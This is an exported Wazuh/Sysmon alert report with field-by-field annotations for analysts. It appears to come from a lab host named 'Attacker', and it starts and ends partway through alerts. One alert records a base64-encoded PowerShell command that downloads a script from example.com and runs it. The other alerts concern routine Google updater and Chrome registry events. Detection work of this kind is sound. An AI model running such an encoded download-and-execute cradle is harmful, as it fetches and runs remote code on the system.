data.win.eventdata.processGuid:  {94294ddc-bc1b-680a-0b0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  9120
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\cmd.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3624 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows Command Processor
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  Cmd.Exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\system32\\cmd.exe\" /Q /C \"\"C:\\Program Files (x86)\\Google\\GoogleUpdater\\137.0.7115.0\\uninstall.cmd\" --dir=\"C:\\Program Files (x86)\\Google\\GoogleUpdater\\137.0.7115.0\"\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\WINDOWS\\system32\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=6EEF334D826BE3DC737BB30FBE84B69E529AAB956EC33D714B5A75276A58ED04
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bc07-680a-f709-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  8992
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Program Files (x86)\\Google\\GoogleUpdater\\137.0.7115.0\\updater.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\Program Files (x86)\\Google\\GoogleUpdater\\137.0.7115.0\\updater.exe\" --system --windows-service --service=update-internal
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:44.749+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:44.749+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534204.751824
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:33:13.6930233Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  280095
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:33:12.668 ProcessGuid: {94294ddc-bc28-680a-220a-000000000e00} ProcessId: 11012 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bc25-680a-1d0a-000000000e00} ParentProcessId: 13852 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:33:12.668
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bc28-680a-220a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11012
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bc25-680a-1d0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  13852
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:44.957+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:44.957+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  6
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534204.759894
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:33:19.6224934Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  280237
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:33:19.616 ProcessGuid: {94294ddc-bc2b-680a-270a-000000000e00} ProcessId: 15028 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_5klyxkyf.pry.ps1 CreationUtcTime: 2025-04-24 22:33:19.615 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:33:19.616
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bc2b-680a-270a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  15028
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_5klyxkyf.pry.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:33:19.615
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{B9A8F440-6AF8-49E0-98A4-35D48B0E4739} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|Name=Google Chrome (mDNS-In)|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome|

🧠 What happened? Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{B9A8F440-6AF8-49E0-98A4-35D48B0E4739} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|Name=Google Chrome (mDNS-In)|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome|

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:45.086+0000 | 🧠 MITRE: ['Persistence', 'Privilege Escalation'] – ['Windows Service'] [T1543.003]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1543.003

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:45.086+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{B9A8F440-6AF8-49E0-98A4-35D48B0E4739} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|Name=Google Chrome (mDNS-In)|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome|
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92307
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1543.003']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Persistence', 'Privilege Escalation']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Windows Service']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  7
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid13_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534205.762662
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  13
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  13
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:33:22.7768023Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  280333
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Registry value set: RuleName: - EventType: SetValue UtcTime: 2025-04-24 22:33:22.771 ProcessGuid: {94294ddc-ea86-67fe-3b00-000000000e00} ProcessId: 2892 Image: C:\WINDOWS\system32\svchost.exe TargetObject: HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{B9A8F440-6AF8-49E0-98A4-35D48B0E4739} Details: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\Program Files\Google\Chrome\Application\chrome.exe|Name=Google Chrome (mDNS-In)|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome| User: NT AUTHORITY\LOCAL SERVICE"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.eventType:  SetValue
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:33:22.771
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-ea86-67fe-3b00-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  2892
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\system32\\svchost.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetObject:  HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{B9A8F440-6AF8-49E0-98A4-35D48B0E4739}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.details:  v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|Name=Google Chrome (mDNS-In)|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome|
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\LOCAL SERVICE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\GoogleChromeElevationService\\ImagePath binary is: \"C:\\Program Files\\Google\\Chrome\\Application\\135.0.7049.115\\elevation_service.exe\"

🧠 What happened? Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\GoogleChromeElevationService\\ImagePath binary is: \"C:\\Program Files\\Google\\Chrome\\Application\\135.0.7049.115\\elevation_service.exe\"

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:45.118+0000 | 🧠 MITRE: ['Persistence', 'Privilege Escalation'] – ['Windows Service'] [T1543.003]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1543.003

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:45.118+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\GoogleChromeElevationService\\ImagePath binary is: \"C:\\Program Files\\Google\\Chrome\\Application\\135.0.7049.115\\elevation_service.exe\"
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92307
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1543.003']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Persistence', 'Privilege Escalation']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Windows Service']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  8
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid13_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534205.766890
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  13
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  13
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:33:22.8414954Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  280341
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Registry value set: RuleName: - EventType: SetValue UtcTime: 2025-04-24 22:33:22.836 ProcessGuid: {94294ddc-ea7f-67fe-0b00-000000000e00} ProcessId: 772 Image: C:\WINDOWS\system32\services.exe TargetObject: HKLM\System\CurrentControlSet\Services\GoogleChromeElevationService\ImagePath Details: "C:\Program Files\Google\Chrome\Application\135.0.7049.115\elevation_service.exe" User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.eventType:  SetValue
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:33:22.836
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-ea7f-67fe-0b00-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  772
